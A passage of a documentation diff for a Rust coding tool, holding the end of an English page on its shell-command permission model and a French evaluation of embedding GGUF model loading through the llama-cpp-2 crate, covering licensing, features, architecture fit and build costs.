+and fast, but with no composable rule engine, no distinction between
+"permitted" and "explicitly trusted," and no dedicated protection against
+operator-chaining tricks (it does parse commands with `tree-sitter` to
+flag risky patterns, which is real but architecturally different from a
+rule engine with denylists and allowlists). Crustly's model is more
+deliberately layered: a typed three-way decision, composable rules, hard
+denylists that survive even `full_auto` plan mode, and test coverage for a
+specific, named bypass class (shell operator chaining past an allowlist).
+
+This is not a claim that Crustly is "unhackable" — see the limits below —
+only that its permission engine is structurally deeper than OpenCode's by
+design, not by accident.
+
+---
+
+## What this model does *not* do (honest limits)
+
+- **No OS-level sandboxing.** There's no seccomp/container/VM isolation
+  around an approved bash command — once a command is approved (by the
+  allowlist as `Trusted`, or by the user at the prompt), it runs with the
+  full privileges of the Crustly process. The policy engine controls
+  *whether and when to ask*, not *what an approved command can do once
+  running*.
+- **`full_auto` plan mode removes the human from task-level decisions.**
+  The `[security]` denylists still apply, but there's no approval prompt
+  to catch something the denylist didn't anticipate. Treat `full_auto` as
+  an explicit trust decision, not a safety net.
+- **The allowlist matches the first token only.** It's a convenience for
+  reducing prompt fatigue on genuinely safe, argument-free-of-danger
+  commands (`git status`, `cargo test`) — not a substitute for reading
+  what you approve at the prompt for anything else.
+
+---
+
+## Verifying this yourself
+
+```bash
+cargo test --lib llm::tools::sandbox
+```
+
+Read `src/llm/tools/sandbox.rs` directly — the test module at the bottom
+of the file is the actual specification of this behavior, not this
+document. If this guide and the code ever disagree, the code is correct
+and this file needs updating.

--- a/llm-file-gguf-support.md
+++ b/llm-file-gguf-support.md
@@ -1,62 +1,48 @@
-# Spécification d'évaluation : chargement direct de modèles GGUF (sans Ollama)
+# Spécification d'évaluation : chargement direct de modèles GGUF via `llama-cpp-2`
 
 Statut : **Évaluation — aucune implémentation engagée**
 Date : 2026-07-21
-Portée : évaluer l'intégration de tout ou partie de
-[`cactus-compute/cactus`](https://github.com/cactus-compute/cactus) (ou d'une
-alternative) pour permettre à Crustly de charger et exécuter un modèle depuis
+Portée : évaluer l'intégration de la crate
+[`llama-cpp-2`](https://github.com/utilityai/llama-cpp-rs) (bindings Rust vers
+`llama.cpp`) pour permettre à Crustly de charger et exécuter un modèle depuis
 un fichier `.gguf` local, **sans dépendre d'un serveur Ollama externe**, dans
-l'objectif d'obtenir une application plus monolithique.
+l'objectif d'obtenir une application plus monolithique. Bénéfices et coûts
+évalués spécifiquement pour ce dépôt.
 
 ---
 
 ## 0. Résumé exécutif
 
-**Recommandation : ne pas intégrer `cactus-compute/cactus`.** Trois blocages
-indépendants, chacun suffisant à lui seul :
+`llama-cpp-2` est **techniquement le bon candidat** pour cet objectif : c'est
+un binding Rust direct vers l'implémentation de référence du format GGUF,
+publié sur crates.io, sous licence MIT OR Apache-2.0 (compatible avec la
+licence FSL-1.1-MIT de Crustly), maintenu activement (mise à jour début
+juillet 2026, 841 745 téléchargements cumulés, 615 ★ sur le dépôt source) et
+couvrant nativement tout ce qu'il faut : chargement `.gguf` sans conversion,
+backends CPU/CUDA/Metal/Vulkan, génération contrainte par grammaire
+(utile pour le tool-calling), et support multimodal (`mtmd`).
 
-1. **Licence incompatible avec la distribution actuelle de Crustly.** Cactus
-   est sous licence propriétaire (Cactus Compute, Inc.), gratuite seulement
-   pour les particuliers, les organismes à but non lucratif, et les
-   organisations dont le financement **et** le chiffre d'affaires sont tous
-   deux inférieurs à 2 000 000 USD — avec **résiliation automatique** au
-   franchissement de l'un des deux seuils. Intégrer ce moteur dans un binaire
-   Crustly redistribué publiquement reporterait cette contrainte sur chaque
-   utilisateur/redistributeur en aval, ce que Crustly (sous FSL-1.1-MIT, un
-   modèle "source-available" qui redevient MIT après 2 ans, mais reste
-   librement redistribuable dès maintenant) ne peut pas garantir de respecter.
-2. **Depuis sa v1, Cactus ne charge plus directement des fichiers `.gguf`** :
-   le moteur est passé d'un pipeline basé GGUF à un format propriétaire
-   ("Cactus bundle") produit par `cactus convert`, avec une quantization
-   maison (CQ2–CQ4). La documentation marketing continue de mentionner "tout
-   modèle GGUF depuis HuggingFace", mais le mécanisme réel est une
-   **conversion**, pas un chargement natif — l'objectif "lire un `.gguf`
-   existant sans étape intermédiaire" n'est donc pas rempli tel quel.
-3. **Cible plateforme désalignée.** Cactus est conçu et optimisé pour
-   mobile/edge (iOS, Android, ARM NEON, Metal) ; ses bindings Rust
-   (`bindings/rust/cactus.rs`) sont un wrapper FFI fin au-dessus d'une
-   bibliothèque native précompilée par plateforme (toolchain CMake/Xcode/NDK
-   requise), et ne sont **pas publiés sur crates.io**. Crustly cible des
-   postes de développement Linux/macOS/Windows x86_64/arm64 en `cargo build`
-   simple — le pipeline de build de Cactus n'a pas cette garantie.
+**Mais ce n'est pas une intégration "légère".** Contrairement à l'intégration
+`ollama-rs` déjà livrée dans ce dépôt (un client HTTP typé vers un serveur
+qui fait tout le travail d'inférence), `llama-cpp-2` embarque le **moteur
+d'inférence natif C++ lui-même** dans le binaire de Crustly : compilation
+CMake d'un sous-module C++ à chaque build, gestion mémoire/concurrence du
+modèle dans le process TUI, ré-implémentation du cycle de vie et du
+tool-calling que le daemon Ollama gère aujourd'hui gratuitement. C'est un
+changement de nature du projet (client réseau → moteur d'inférence embarqué),
+pas une extension incrémentale.
 
-Si l'objectif "monolithique, zéro dépendance externe, lire un `.gguf`
-directement" reste souhaité, la voie techniquement correcte est un binding
-Rust vers **llama.cpp** (ex. crate `llama-cpp-2`), qui lit nativement le
-format GGUF de référence et est disponible sur crates.io sous licence MIT.
-Mais c'est un projet d'ampleur différente d'une intégration de client HTTP
-(comparable à l'intégration `ollama-rs` déjà faite) : c'est l'embarquement
-d'un moteur d'inférence natif C++ dans le binaire, avec les coûts de build,
-de taille binaire et de maintenance que cela implique (détaillés en §6).
-**Recommandation secondaire : traiter cette option comme une ADR séparée,
-précédée d'un spike technique isolé, avant tout engagement de développement.**
+**Recommandation : faisable et alignée techniquement, mais à traiter comme un
+projet séparé avec spike de validation avant tout engagement**, pas comme un
+ajout de provider ordinaire. Voir §7 pour le calcul coût/bénéfice détaillé et
+§9 pour la marche à suivre si retenue.
 
 ---
 
 ## 1. Contexte : pourquoi cette évaluation
 
 Crustly supporte aujourd'hui l'inférence locale via deux chemins, tous deux
-**des clients HTTP vers un processus externe** :
+**des clients HTTP vers un processus externe déjà démarré** :
 
 | Chemin | Fichier | Mécanisme |
 |---|---|---|
@@ -64,338 +50,406 @@ Crustly supporte aujourd'hui l'inférence locale via deux chemins, tous deux
 | Compatible OpenAI (LM Studio, Ollama, LocalAI) | `src/llm/provider/openai.rs` avec `base_url` custom | `async-openai`/HTTP vers un serveur OpenAI-compatible local |
 
 Dans les deux cas, **Crustly ne charge jamais lui-même de poids de modèle** :
-il délègue entièrement l'inférence (chargement du `.gguf`, quantization au
-runtime, kernels CPU/GPU, gestion mémoire du KV-cache) à un processus tiers
-déjà démarré. C'est ce qui rend l'intégration `ollama-rs` relativement légère
-(voir `ollama-rs-integration-plan.md`, ~700 lignes de plan pour un client HTTP
-typé) : aucun code d'inférence, juste du mapping requête/réponse.
+il délègue entièrement l'inférence (lecture du `.gguf`, dé-quantization au
+runtime, kernels CPU/GPU, gestion mémoire du KV-cache) à un processus tiers.
+C'est ce qui rend l'intégration `ollama-rs` relativement légère (voir
+`ollama-rs-integration-plan.md`, ~700 lignes de plan pour un client HTTP
+typé) : aucun code d'inférence, uniquement du mapping requête/réponse.
 
-L'idée évaluée ici est différente en nature : **faire tourner l'inférence
-dans le process Crustly lui-même**, en lisant un fichier `.gguf` directement
-depuis le disque, sans dépendre d'Ollama (ni d'aucun autre serveur externe)
-étant démarré au préalable. Objectif déclaré : une distribution plus
-monolithique (un seul binaire, une seule installation, pas de service tiers à
-gérer).
-
----
-
-## 2. Ce qu'implique réellement "charger un GGUF sans Ollama"
+L'idée évaluée ici change de nature : **faire tourner l'inférence dans le
+process Crustly lui-même**, en lisant un fichier `.gguf` directement depuis
+le disque, sans dépendre d'aucun serveur externe démarré au préalable.
+Objectif déclaré : une distribution plus monolithique (un seul binaire, une
+seule installation, pas de service tiers à gérer).
 
 Le format GGUF est un conteneur binaire (métadonnées + tenseurs quantifiés).
-Le "lire" ne suffit pas : il faut aussi **exécuter** le modèle, ce qui
-nécessite un moteur d'inférence complet :
-
-- désérialisation GGUF (métadonnées, vocabulaire, tenseurs)
-- dé-quantization / kernels de calcul (matmul, attention) pour chaque format
-  de quantization supporté (Q4_K_M, Q5_K_S, Q8_0, …)
-- gestion du KV-cache et de la fenêtre de contexte
-- backends d'exécution (CPU SIMD — AVX2/NEON —, et idéalement GPU — CUDA,
-  Metal, Vulkan — pour des débits utilisables)
-- tokenizer(s) compatibles (BPE, SentencePiece, selon la famille de modèle)
-- gestion mémoire (mmap du fichier modèle, allocation du KV-cache)
-
-C'est un sous-système d'une toute autre échelle que celui écrit pour
-`ollama.rs` (client HTTP typé). Concrètement, cela revient à embarquer
-l'équivalent de **llama.cpp** (ou un moteur propriétaire qui en tient lieu)
-dans le binaire de Crustly. Aucun projet sérieux dans cet espace ne réécrit ce
-moteur en Rust pur pour cet usage — l'écosystème mûr (`llama.cpp`, `candle`,
-`mistral.rs`) s'appuie soit sur du C++/CUDA existant via FFI, soit sur des
-kernels dédiés très lourds à maintenir.
+Le "lire" ne suffit pas : il faut aussi **exécuter** le modèle — désérialiser
+les tenseurs, dé-quantifier, faire tourner les kernels matmul/attention,
+gérer le KV-cache et la fenêtre de contexte, tokenizer le texte. C'est un
+moteur d'inférence complet, pas un parseur de fichier. `llama-cpp-2` fournit
+exactement ce moteur en embarquant `llama.cpp` (la référence C++ du
+domaine) via FFI.
 
 ---
 
-## 3. Analyse de `cactus-compute/cactus`
+## 2. `llama-cpp-2` : ce que c'est
 
-### 3.1 Nature du projet
+### 2.1 Composition et provenance
 
-Cactus est un moteur d'inférence "hybride edge-cloud", **conçu pour mobile et
-wearables** ("Tiny AI for tiny devices") : iOS, Android, macOS, iPad, Vision
-Pro. Il expose des bindings Swift, Kotlin, Flutter, React Native, Python,
-Rust, C/C++, avec une API façon OpenAI (`cactus_init`, `cactus_complete`) et
-un mode serveur (`cactus serve`, HTTP compatible OpenAI). Projet actif et
-soutenu (Y Combinator, ~5.5k ★, releases régulières jusqu'à v2.0.1 début
-juillet 2026).
+Le dépôt [`utilityai/llama-cpp-rs`](https://github.com/utilityai/llama-cpp-rs)
+publie deux crates complémentaires sur crates.io :
 
-### 3.2 Moteur d'inférence : plus du tout basé sur llama.cpp/GGUF
+- **`llama-cpp-2`** — API Rust de haut niveau (modèle, contexte, batch,
+  sampling, tokenisation).
+- **`llama-cpp-sys-2`** — bindings FFI bruts, générés par `bindgen`, qui
+  compilent le sous-module Git vendoré de `llama.cpp` via la crate `cmake`
+  au moment du `cargo build`.
 
-Point le plus important pour cette évaluation : **la v1 de Cactus a
-abandonné GGUF pour un format propriétaire**, dans un objectif de
-performance sur device mobile :
+Design assumé par les mainteneurs : rester "aussi proche que possible des
+bindings bruts" et "aussi à jour que possible avec `llama.cpp`" —
+**explicitement pas suivi en SemVer strict** (versionnage actuel :
+`llama-cpp-2` v0.1.151, `llama-cpp-sys-2` v0.1.152). C'est un point à noter
+pour la maintenance long terme (§6.3).
 
-- `cactus-graph` : graphe de calcul "zero-copy"
-- `cactus-kernels` : kernels SIMD ARM NEON écrits sur mesure par appareil
-- `cactus-quants` : quantization "par rotation" maison, 1 à 4 bits (CQ2, CQ3,
-  CQ2.54, CQ3.26, CQ4)
+### 2.2 Licence
 
-Le flux normal est `cactus convert <modèle HuggingFace>` → bundle Cactus
-propriétaire (poids quantifiés + graphe d'exécution), ou `cactus download`
-pour récupérer un bundle déjà converti. La documentation/marketing continue
-d'affirmer que "tout modèle GGUF sur HuggingFace" est supporté "via
-migration", mais cela décrit une **conversion vers le format propriétaire**,
-pas un chargement natif d'un `.gguf` existant tel quel — ce qui ne correspond
-pas à l'objectif "lire directement un fichier `.gguf`" évalué ici. Les
-sources publiques sur ce point sont partiellement contradictoires (pages
-marketing vs. documentation technique) ; à re-vérifier auprès du mainteneur
-avant toute décision si cette piste était malgré tout retenue.
+`MIT OR Apache-2.0` — pleinement compatible avec la licence FSL-1.1-MIT de
+Crustly (`Cargo.toml` ligne 7), sans aucune des contraintes commerciales
+qu'aurait posées une dépendance sous licence propriétaire. Aucun blocage
+juridique de ce côté.
 
-**Conséquence directe** : intégrer Cactus n'apporte pas "charger un `.gguf`
-sans conversion" — il faudrait de toute façon une étape de conversion
-propriétaire, comparable en complexité opérationnelle à `ollama pull`
-aujourd'hui, mais avec un outil et un format supplémentaires à maintenir.
+### 2.3 Maturité
 
-### 3.3 Licence — blocage principal
+- 841 745 téléchargements cumulés sur crates.io, 430 790 sur la période
+  récente (signal d'usage actif, pas seulement historique).
+- 615 ★ / 218 forks sur GitHub, 151 versions publiées, dernière mise à jour
+  début juillet 2026 — mis à jour au fil des sorties de `llama.cpp`.
+- 33 issues ouvertes, 12 PR en cours — niveau d'activité de mainteneur sain
+  pour une crate de cette taille.
+- Créée en janvier 2024, donc ~2,5 ans d'historique au moment de cette
+  évaluation.
 
-Licence custom "Cactus Compute, Inc." (ni MIT/Apache, ni copyleft
-classique — source-available à conditions commerciales) :
+### 2.4 Fonctionnalités couvertes (features Cargo)
 
-- Gratuit pour : particuliers (usage personnel/éducatif/recherche/non
-  commercial), établissements d'enseignement, associations 501(c)(3), et
-  organisations dont le **financement total < 2 M USD ET le chiffre
-  d'affaires annuel brut < 2 M USD** (les deux conditions, cumulatives).
-- **Résiliation automatique** : si une organisation qui remplissait ces
-  critères dépasse l'un des deux seuils, l'autorisation s'arrête
-  immédiatement et une licence commerciale doit être obtenue sous 30 jours.
-- Toute entité hors de ces catégories (y compris dès le départ) doit obtenir
-  une licence commerciale séparée.
+Extrait du `Cargo.toml` de `llama-cpp-2` :
 
-**Pourquoi c'est bloquant pour Crustly spécifiquement** : Crustly est
-lui-même distribué sous FSL-1.1-MIT (Functional Source License) — un modèle
-de licence "à conditions" mais qui reste librement utilisable/redistribuable
-dès aujourd'hui, et qui redevient MIT pur après 2 ans par version. Crustly ne
-contrôle pas qui télécharge/recompile/redistribue son binaire ni la taille de
-l'organisation de chaque utilisateur final. Embarquer une dépendance dont la
-licence dépend de la taille financière de *l'utilisateur final de Crustly*
-(pas de Crustly lui-même) transfère une contrainte de conformité
-imprévisible et non vérifiable à toute la chaîne de distribution — un risque
-qu'un outil dev "cargo install"-able / packagé (Homebrew, binaires GitHub
-Releases, etc.) ne peut pas absorber proprement sans segmenter sa
-distribution (build "avec Cactus" réservé à certains utilisateurs vs. build
-public sans). C'est une complexité de packaging et un risque juridique que le
-gain fonctionnel ne justifie pas.
+```toml
+[features]
+default = ["openmp", "android-shared-stdcxx", "common"]
+cuda = ["llama-cpp-sys-2/cuda"]
+metal = ["llama-cpp-sys-2/metal"]
+vulkan = ["llama-cpp-sys-2/vulkan"]
+rocm = ["llama-cpp-sys-2/rocm"]
+opencl = ["llama-cpp-sys-2/opencl"]
+mkl = ["llama-cpp-sys-2/mkl"]
+openmp = ["llama-cpp-sys-2/openmp"]
+mtmd = ["llama-cpp-sys-2/mtmd"]                     # multimodal (vision)
+llguidance = ["dep:llguidance", "dep:toktrie"]       # génération contrainte par grammaire/JSON
+sampler = []
+dynamic-link = ["llama-cpp-sys-2/dynamic-link"]
+system-ggml = ["llama-cpp-sys-2/system-ggml"]
+```
 
-### 3.4 Bindings Rust et intégration technique
+Deux features méritent une mention particulière dans le contexte de
+Crustly :
 
-- `bindings/rust/` ne contient que `cactus.rs` (un fichier unique avec
-  attributs `#[link(...)]`) + un README expliquant de le copier dans son
-  projet et de pointer `build.rs` vers le répertoire de build de la
-  bibliothèque native précompilée. **Pas de crate publié sur crates.io.**
-- La bibliothèque native (`cactus-engine`) doit être compilée/liée par
-  plateforme cible (toolchain CMake/Xcode/NDK selon iOS/Android/macOS) —
-  aucune garantie de portabilité "out of the box" vers Linux x86_64/Windows,
-  les plateformes desktop réellement ciblées par Crustly (`cargo build`,
-  `cargo build --release` sans dépendance externe, tel que documenté dans
-  `CLAUDE.md`).
-- API exposée : `cactus_init`, `cactus_complete`, fonctions de streaming
-  transcription — orientée mobile-app-embarquée, pas serveur/CLI desktop.
+- **`mtmd`** (multimodal) : correspondrait à `Provider::supports_vision()`
+  dans le trait actuel (`src/llm/provider/trait.rs` ligne 42) — utile car
+  Ollama/OpenAI-compat gèrent déjà la vision aujourd'hui, une intégration
+  GGUF native sans cette feature serait une régression fonctionnelle.
+- **`llguidance`** (via `llguidance`/`toktrie`, la bibliothèque de génération
+  contrainte par grammaire) : permettrait de forcer la sortie du modèle à
+  respecter un schéma JSON — une alternative potentiellement **plus fiable**
+  que l'heuristique actuelle de récupération de tool calls imprimés en texte
+  brut (`maybe_tool_call_json`/`tool_call_from_content` dans `ollama.rs`
+  lignes 607-655, et le `ToolCallParser` dédié de `qwen.rs`). C'est un
+  bénéfice réel et spécifique à cette crate, pas juste une parité avec
+  l'existant.
 
-### 3.5 Maturité et stabilité d'API
+### 2.5 Exemples fournis (repère pour l'API)
 
-Projet actif, mais le changement de format de modèle entre versions majeures
-(GGUF → propriétaire à la v1, refonte "complète" du moteur d'inférence selon
-les notes de version) signale une **API/format encore mouvants** — un risque
-de maintenance supplémentaire si Crustly devait suivre ces changements.
+Le dépôt fournit des exemples couvrant : `simple` (chargement modèle +
+complétion), `embeddings`, `mtmd` (multimodal), `reranker`, `llguidance.rs`
+(génération contrainte), `usage.rs`. L'exemple `simple` démontre le
+chargement direct d'un `.gguf` quantifié (`Q4_K_M`, `Q6_K`) téléchargé depuis
+HuggingFace — confirmant le chargement natif visé par cette évaluation, sans
+étape de conversion.
 
 ---
 
-## 4. Alternative techniquement alignée : `llama-cpp-2` (bindings Rust vers llama.cpp)
+## 3. Alignement avec l'architecture Crustly actuelle
 
-Si l'objectif reste "lire un `.gguf` sans conversion, sans serveur externe",
-la voie correcte est un binding Rust direct vers **llama.cpp**, la
-implémentation de référence du format GGUF :
+### 3.1 Le trait `Provider` s'y prête sans modification
 
-| Critère | `llama-cpp-2` / `llama_cpp` (crates.io) | Cactus |
-|---|---|---|
-| Lit un `.gguf` existant sans conversion | ✅ natif | ❌ conversion requise |
-| Licence | MIT (llama.cpp) — compatible FSL-1.1-MIT | ❌ propriétaire, seuils financiers |
-| Publié sur crates.io | ✅ | ❌ (copier-coller de fichier) |
-| Backends | CPU (AVX2/NEON), CUDA, Metal, Vulkan | ARM NEON / Metal (mobile-first) |
-| Cible plateforme | Linux/macOS/Windows desktop — aligné Crustly | iOS/Android/mobile-first |
-| Maturité écosystème | Très large (des dizaines de milliers de projets s'appuient sur llama.cpp) | Plus jeune, API en mouvement |
+`src/llm/provider/trait.rs` (lignes 18-65) définit une interface
+agnostique du transport : `complete()`, `stream()`,
+`supports_streaming/tools/vision()`, `name()`, `default_model()`,
+`context_window()`, `calculate_cost()`. Un provider GGUF natif
+(`src/llm/provider/gguf.rs`, nouveau fichier) implémenterait ce même trait,
+câblé dans `factory.rs` exactement comme `try_create_ollama()` l'est
+aujourd'hui — **aucune modification du trait n'est nécessaire**, contrainte
+de compatibilité déjà respectée par construction.
 
-Ce chemin est **faisable**, mais reste un projet d'ampleur nettement
-supérieure à l'intégration `ollama-rs` existante, pour les raisons du §5.
+`calculate_cost()` retournerait simplement `0.0` (pas d'appel API payant,
+comme c'est déjà implicitement le cas pour un modèle local).
+
+### 3.2 Écart de schéma de configuration à combler
+
+`ProviderConfig` générique (`src/config/mod.rs` ligne 346) ne connaît qu'un
+`default_model: String` — un nom résolu par un serveur distant, jamais un
+chemin de fichier local. Aucun champ existant pour un chemin `.gguf`, un
+nombre de threads CPU, un nombre de couches déportées sur GPU
+(`n_gpu_layers`), ou une taille de contexte propre à un fichier modèle donné.
+Il faudrait un nouveau type de configuration, sur le modèle
+d'`OllamaModelConfig` (`src/config/mod.rs` ligne 499, réglages par modèle) ou
+de `QwenProviderConfig` (ligne 366, précédent le plus proche pour un
+déploiement local avec réglages bas niveau) :
+
+```rust
+pub struct GgufProviderConfig {
+    pub model_path: PathBuf,       // chemin vers le fichier .gguf
+    pub n_ctx: Option<u32>,        // taille de contexte (par défaut celle du modèle)
+    pub n_threads: Option<u32>,    // threads CPU pour le décodage
+    pub n_gpu_layers: Option<u32>, // couches déportées sur GPU (0 = CPU only)
+    // pas de champ "quantization" : intrinsèque au fichier .gguf choisi
+}
+```
+
+### 3.3 Crabrace n'a aucun rôle ici
+
+Le registre `crabrace.rs` (§0003 des ADR) modélise des providers
+**joignables sur le réseau** (API cloud ou daemon local avec surface HTTP).
+Un moteur GGUF en process n'a pas de tel point d'entrée à enregistrer — il
+contournerait Crabrace entièrement, comme le fait déjà `QwenProvider` pour
+ses aspects spécifiques. Pas d'implication architecturale au-delà de ce
+constat.
+
+### 3.4 Précédent de feature flag à suivre
+
+`ollama = ["dep:ollama-rs", "dep:schemars"]` dans `Cargo.toml`, gaté de façon
+cohérente dans `src/llm/provider/mod.rs` (`#[cfg(feature = "ollama")]`) et
+`factory.rs` (avec un stub no-op quand la feature est désactivée). Une
+nouvelle feature `gguf` suivrait exactement ce patron :
+
+```toml
+[dependencies]
+llama-cpp-2 = { version = "0.1", optional = true, features = ["openmp"] }
+
+[features]
+gguf = ["dep:llama-cpp-2"]
+all-llm = ["openai", "aws-bedrock", "ollama", "gguf"]
+```
+
+Optionnelle par défaut, cohérent avec la volonté actuelle de ne pas alourdir
+le binaire par défaut (déjà la politique retenue pour `ollama`, cf. point
+ouvert §9 de `ollama-rs-integration-plan.md`).
 
 ---
 
-## 5. Bénéfices réels d'un chargement GGUF natif (indépendamment du fournisseur)
+## 4. Bénéfices
 
-1. **Zéro dépendance de service externe** : plus besoin qu'Ollama tourne en
-   arrière-plan ; un utilisateur avec juste un fichier `.gguf` sur disque
-   peut lancer Crustly directement.
-2. **Distribution monolithique** : un seul binaire à installer (au prix d'une
-   taille de binaire nettement plus grande, voir §6).
-3. **Contrôle fin du cycle de vie du modèle** dans le process Crustly
-   (chargement, déchargement, paramètres d'inférence) sans passer par l'API
-   HTTP d'un tiers.
-4. **Latence de démarrage** potentiellement meilleure pour un usage
-   ponctuel/CLI (pas de round-trip HTTP, pas de "cold start" du service
-   Ollama) — à mesurer, pas garanti (le chargement mmap d'un gros `.gguf`
-   reste coûteux dans tous les cas).
-
-Bénéfices **non obtenus** par rapport à Ollama tel qu'utilisé aujourd'hui :
-
-- **Partage de modèle entre plusieurs process** : Ollama charge un modèle une
-  fois et sert plusieurs clients (Crustly + autre outil) depuis le même
-  processus ; un moteur embarqué dans Crustly rechargerait le modèle à
-  chaque instance de Crustly lancée (RAM et temps de démarrage multipliés
-  par le nombre de sessions concurrentes).
-- **Gestion de catalogue/téléchargement de modèles** (`ollama pull
-  <nom:tag>`, déjà exposé dans Crustly via `crustly ollama pull` et le
-  dialog TUI `Ctrl+D`, cf. `ollama-rs-integration-plan.md` §5.7) : avec un
-  fichier `.gguf` brut, cette responsabilité (trouver, télécharger, vérifier
-  l'intégrité du fichier) reviendrait entièrement à Crustly.
-- **Déchargement automatique par inactivité** (`keep_alive` d'Ollama) —
-  géré aujourd'hui par le daemon, à réimplémenter côté Crustly.
+1. **Chargement `.gguf` natif, sans conversion.** Contrairement à toute
+   solution qui imposerait un format propriétaire intermédiaire,
+   `llama-cpp-2` lit directement le format GGUF de référence — n'importe
+   quel fichier `.gguf` déjà téléchargé (HuggingFace, `ollama pull` puis
+   export, etc.) est utilisable tel quel.
+2. **Zéro dépendance de service externe.** Plus besoin qu'Ollama (ou un
+   autre serveur) tourne en arrière-plan ; un utilisateur avec un fichier
+   `.gguf` sur disque peut lancer Crustly directement, y compris en
+   environnement air-gapped/restreint où l'installation d'un daemon tiers
+   n'est pas possible.
+3. **Distribution monolithique.** Un seul binaire à installer (au prix d'une
+   taille sensiblement plus grande, voir §5.1).
+4. **Contrôle fin du cycle de vie du modèle** dans le process Crustly
+   (chargement, déchargement, paramètres d'inférence bas niveau) sans passer
+   par l'API HTTP d'un tiers.
+5. **Backends matériels larges** : CPU (avec OpenMP), CUDA, Metal (macOS),
+   Vulkan, ROCm, OpenCL, MKL — couvre l'essentiel du matériel visé par les
+   utilisateurs desktop de Crustly (Linux/macOS/Windows, x86_64/arm64),
+   contrairement à un moteur mobile-first limité à ARM NEON/Metal.
+6. **Génération contrainte par grammaire (`llguidance`)** — un gain
+   fonctionnel *au-delà* de la simple parité avec Ollama : une sortie JSON
+   garantie valide au niveau du décodage token-par-token serait plus fiable
+   que l'heuristique actuelle de récupération de tool calls textuels
+   (`ollama.rs` lignes 607-655), pour peu que le travail d'intégration soit
+   fait (§5.2).
+7. **Support multimodal (`mtmd`)** disponible nativement, évitant une
+   régression de fonctionnalité par rapport à Ollama/OpenAI-compat qui
+   supportent déjà la vision.
+8. **Latence de démarrage** potentiellement meilleure pour un usage
+   ponctuel/CLI (pas de round-trip HTTP, pas de "cold start" d'un service
+   externe) — à mesurer concrètement, le chargement mmap d'un gros `.gguf`
+   restant coûteux dans tous les cas.
 
 ---
 
-## 6. Coûts d'une intégration native (`llama-cpp-2` ou équivalent)
+## 5. Coûts
 
-### 6.1 Build et packaging
+### 5.1 Build et packaging
 
-- Compilation C++/CUDA/Metal de llama.cpp à intégrer au pipeline
-  `cargo build` (via `cmake`/`bindgen`), ou distribution de binaires
-  précompilés par plateforme+backend (Linux CPU, Linux CUDA, macOS Metal,
-  Windows CPU, Windows CUDA, …) — matrice de build significativement plus
-  large que celle actuelle (`cargo build`/`cargo build --release`, aucune
-  toolchain externe requise aujourd'hui).
-- Temps de compilation à froid fortement augmenté (compilation C++ native en
-  plus du Rust).
-- Taille du binaire final en forte hausse (moteur natif + éventuels kernels
-  CUDA embarqués), sans compter le poids des fichiers `.gguf` eux-mêmes
-  (plusieurs GB par modèle, à gérer côté disque quel que soit le mécanisme
-  de chargement).
+- `llama-cpp-sys-2` compile le sous-module Git vendoré de `llama.cpp` via la
+  crate `cmake` à chaque `cargo build` (à moins d'utiliser `system-ggml` avec
+  une lib système préinstallée) — nécessite **CMake et un compilateur C++**
+  sur toute machine qui build Crustly avec la feature `gguf` activée. Rompt
+  la promesse actuelle de `CLAUDE.md` ("Development build: `cargo build`",
+  sans toolchain externe) pour quiconque active cette feature.
+- **Windows** : le `build.rs` distingue explicitement MSVC (`.lib`) et
+  MinGW/GNU (`.a`), avec des drapeaux spécifiques (`/O2`, `/DNDEBUG`, `/FS`,
+  désactivation de `TrackFileAccess`) — signale un chemin de build testé
+  mais qui ajoute une exigence d'outillage (Visual Studio Build Tools avec
+  charge de travail C++, ou toolchain MinGW) absente aujourd'hui du poste de
+  développement Crustly type.
+- **CUDA/Vulkan/ROCm/MKL** ne sont pas auto-détectés : CUDA nécessite un
+  toolkit installé, Vulkan nécessite la variable d'environnement
+  `VULKAN_SDK`, etc. — chaque backend GPU est une case de configuration
+  manuelle supplémentaire pour l'utilisateur qui build depuis les sources.
+- Temps de compilation à froid fortement augmenté (compilation C++ native
+  de `llama.cpp`, en plus du Rust).
+- Taille du binaire final en hausse significative (moteur natif + kernels
+  backend embarqués), sans compter le poids des fichiers `.gguf`
+  eux-mêmes (plusieurs Go par modèle, à gérer côté disque indépendamment
+  du mécanisme de chargement).
 
-### 6.2 Nouveau code applicatif
+### 5.2 Nouveau code applicatif
 
-- Nouveau provider `src/llm/provider/gguf.rs` (ou équivalent) implémentant le
-  trait `Provider` existant (`src/llm/provider/trait.rs`, lignes 18-65) :
-  `complete()`, `stream()`, mapping vers
-  `LLMRequest`/`LLMResponse`/`StreamEvent`. Câblage dans `factory.rs` sur le
-  même modèle que `try_create_ollama()`.
-- **Écart de schéma de configuration à combler** : `ProviderConfig`
-  générique (`src/config/mod.rs` ligne 346) ne connaît qu'un
-  `default_model: String` (un nom résolu par un serveur distant), jamais un
-  chemin de fichier. Aucun champ existant pour un chemin `.gguf`, un niveau
-  de quantization, un nombre de threads CPU, ou un nombre de couches
-  déportées sur GPU (`n_gpu_layers`) — il faudrait un nouveau
-  `GgufProviderConfig` sur le modèle de `QwenProviderConfig` (ligne 366, déjà
-  le précédent le plus proche pour un déploiement "local" avec réglages bas
-  niveau) ou d'`OllamaModelConfig` (ligne 499, réglages par modèle).
-- **Contrairement à `ollama.rs`, ce provider doit aussi gérer** :
-  découverte et validation des fichiers `.gguf` locaux, chargement/
-  déchargement en mémoire (mmap), paramètres d'inférence bas niveau (taille
-  du contexte, threads CPU, offload GPU partiel/total), tokenizer embarqué,
-  et — point sensible — le **tool/function calling**, qu'Ollama gère
-  aujourd'hui côté serveur (avec, déjà, une hétérogénéité notable côté
-  Crustly : `ollama.rs` lignes 607-655 contient une heuristique de secours
-  — `maybe_tool_call_json`/`tool_call_from_content` — qui détecte un tool
-  call imprimé en JSON brut dans le flux de texte quand le template du
-  modèle ne peuple pas le champ natif `tool_calls`, et `qwen.rs` a son
-  propre `ToolCallParser` pour les formats "hermes"/"openai"). Un moteur
-  GGUF brut, exécutant des modèles open-weight arbitraires, aura le même
-  besoin de parsing de secours — indépendant du transport (daemon Ollama vs.
-  moteur en process), donc ce n'est pas un coût nouveau propre à
-  l'intégration native, mais confirme que le "vrai" travail de
-  tool-calling reste à faire même après avoir résolu le chargement du
-  `.gguf`.
-- Gestion mémoire/concurrence : un modèle chargé dans le process Crustly
-  occupe la RAM pendant toute la durée de vie de l'app (ou nécessite une
-  logique de déchargement maison) ; à coordonner avec le reste de
-  l'application (TUI, DB, tools) qui tourne dans le même process — risque de
-  pression mémoire ou de blocage du thread si l'inférence CPU n'est pas
-  correctement isolée dans une tâche `tokio::task::spawn_blocking`.
-- **Précédent de feature flag à suivre** : `ollama = ["dep:ollama-rs",
